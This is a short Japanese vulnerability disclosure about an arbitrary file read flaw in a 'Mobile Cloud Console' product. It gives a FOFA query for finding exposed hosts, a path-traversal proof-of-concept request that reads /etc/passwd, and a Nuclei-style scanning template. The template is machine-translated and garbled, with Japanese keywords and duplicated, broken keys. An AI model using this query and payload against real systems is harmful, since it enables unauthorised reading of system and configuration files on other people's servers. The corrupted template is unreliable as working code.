モバイル・クラウド・コンソールに任意のファイル読み取りの脆弱性
アプリケーションのセキュリティ 1658
Mobile Cloud Consoleは、モバイルクラウド製品およびサービスを統一的に表示および管理するために使用されるシステムです。Mobile Cloud Consoleには、任意のファイルを読み取る脆弱性があり、無許可の攻撃者によって悪用され、ウェブサイトの設定ファイルなどの機密情報を読み取られる可能性があります。
fofa
body="op-login-static/favicon.ico" || header="/oauth2/code/opgateway"
ポック
GET /api/query/helpcenter/api/v2/preview?fileName=.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1
ホスト: ip
ヤムル
id: cmecloud-console-readfile
info: 名前: cmecloud-console-readfile
名前: cmecloud-console-readfile
作成者: onewin
重大度: 高
説明: モバイルクラウドコンソールは任意のファイル読み込みのために存在する
http.
- raw.
- |+
タイムアウト: 30s
GET /api/query/helpcenter/api/v2/preview?fileName=.../.../.../.../.../.../.../.../etc/passwd HTTP/1.1
ホスト: {{ホスト名}}
matchers-condition: そして
matchers: {{ホスト名}}
- type: status
status: {{ホスト名}} matchers-condition: and matchers: type: status
- 200
- タイプ: word
単語。
- ルート
パート: ボディ